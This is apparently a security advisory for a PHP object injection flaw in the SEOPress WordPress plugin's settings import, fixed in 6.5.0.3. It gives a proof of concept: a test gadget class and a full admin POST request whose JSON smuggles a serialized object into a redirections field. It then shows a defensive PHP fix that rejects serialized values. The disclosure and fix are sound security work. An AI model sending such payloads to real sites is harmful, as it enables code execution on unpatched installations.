SEOPress < 6.5.0.3 - Admin+ PHP Object Injection

Description

The plugin unserializes user input supplied through its settings import, which could allow high-privilege users such as administrators to perform PHP Object Injection when a suitable gadget chain is present on the site.

Proof of Concept

To simulate a gadget chain, put the following code in a plugin (any class with a magic method such as __wakeup that runs on unserialize will do):

<?php
// Test gadget: __wakeup() runs as soon as a serialized "Evil" object is unserialized.
class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Then send the request below as an administrator and view the response, which will contain the "Arbitrary deserialization" message.

POST /wordpress/wp-admin/admin.php?page=seopress-import-export HTTP/1.1
Host: {host}
Content-Length: 1247
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryURsXiXeTIw5lD9oX
Cookie: {cookie}

------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="import_file"; filename="seopress-settings-export-03-04-2023.json"
Content-Type: application/json

{"seopress_activated":"","seopress_titles_option_name":"","seopress_social_option_name":"","seopress_google_analytics_option_name":"","seopress_advanced_option_name":"","seopress_xml_sitemap_option_name":"","seopress_pro_option_name":"","seopress_pro_mu_option_name":"","seopress_pro_license_key":"","seopress_pro_license_status":"","seopress_bot_option_name":"","seopress_toggle":"","seopress_google_analytics_lock_option_name":"","seopress_tools_option_name":"","seopress_dashboard_option_name":false,"seopress_instant_indexing_option_name":"","redirections":{"xxx":{"sources":"O:4:\"Evil\":0:{};"}}}
------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="seopress_action"

import_rk_redirections
------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="seopress_import_rk_redirections_nonce"

0e1a353e06
------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/admin.php?page=seopress-import-export
------WebKitFormBoundaryURsXiXeTIw5lD9oX--
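The fix for this class of bug is to never pass imported settings values through unserialize(), and, where a field genuinely has to be restored from serialized form, to do so with object instantiation disabled. The following PHP is an added example and not SEOPress's own code: the function names, the validation rules and the JSON shape are assumptions modelled on the PoC request above. It rejects any "sources" value that looks like a serialized blob and shows unserialize() with allowed_classes set to false, so a payload like the one in the PoC yields a __PHP_Incomplete_Class and no __wakeup() is invoked.

```php
<?php
// Added example, not SEOPress code. Defensive handling of a settings import
// like the one in the PoC. Function names and JSON shape are assumptions.

declare(strict_types=1);

/**
 * True if $value has the shape of a PHP-serialized string. The "O:4:" prefix in
 * the PoC is a serialized object; arrays (a:), strings (s:) etc. are also caught.
 */
function looks_serialized(string $value): bool {
    return (bool) preg_match('/^(?:[abdiONs]:|N;)/', ltrim($value));
}

/**
 * Restore a serialized setting without instantiating any class. Objects in the
 * payload become __PHP_Incomplete_Class, so no __wakeup/__destruct gadget runs.
 */
function unserialize_no_objects(string $value): mixed {
    return unserialize($value, ['allowed_classes' => false]);
}

// Stand-in for WordPress sanitize_text_field() so the example runs outside WP.
function sanitize_text_field_like(string $s): string {
    return trim(strip_tags($s));
}

/**
 * Validate the "redirections" block of an uploaded settings export (hypothetical
 * handler). Returns ['accepted' => [...], 'rejected' => [...]] so the caller can
 * log rejected entries instead of silently storing them.
 */
function import_redirections_safe(string $json): array {
    $data = json_decode($json, true, 512, JSON_THROW_ON_ERROR);
    $accepted = [];
    $rejected = [];
    foreach ($data['redirections'] ?? [] as $key => $entry) {
        $source = is_array($entry) ? ($entry['sources'] ?? null) : null;
        // A redirection source is a path or URL: a plain, non-empty string that
        // is not a serialized blob. Anything else is rejected, never unserialized.
        if (!is_string($source) || $source === '' || looks_serialized($source)) {
            $rejected[(string) $key] = $source;
            continue;
        }
        $accepted[(string) $key] = sanitize_text_field_like($source);
    }
    return ['accepted' => $accepted, 'rejected' => $rejected];
}

// Constructed sample inputs: one benign export and one carrying the PoC payload.
$benign  = '{"redirections":{"old-page":{"sources":"/old-page"}}}';
$hostile = '{"redirections":{"xxx":{"sources":"O:4:\\"Evil\\":0:{};"}}}';

var_export(import_redirections_safe($benign));   // "old-page" accepted
echo PHP_EOL;
var_export(import_redirections_safe($hostile));  // "xxx" rejected, nothing unserialized
echo PHP_EOL;

// For a field that legitimately stores serialized data, restore it with classes disabled.
$restored = unserialize_no_objects('O:4:"Evil":0:{}');
echo get_class($restored), PHP_EOL;               // __PHP_Incomplete_Class; __wakeup never runs
```

Run it with php on the command line; no WordPress install is needed. The allowed_classes option has been available since PHP 7.0, so it can be applied to any existing unserialize() call on settings data as a first line of defence while the import code is reworked to store plain strings.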

Affects Plugins

Fixed in 6.5.0.3

Classification

Type
OBJECT INJECTION
Miscellaneous

Original Researcher
Nguyen Huu Do
Submitter
Nguyen Huu Do
Verified
Yes

Timeline

Publicly Published
2023-04-10
Added
2023-04-10
Last Updated
2023-04-10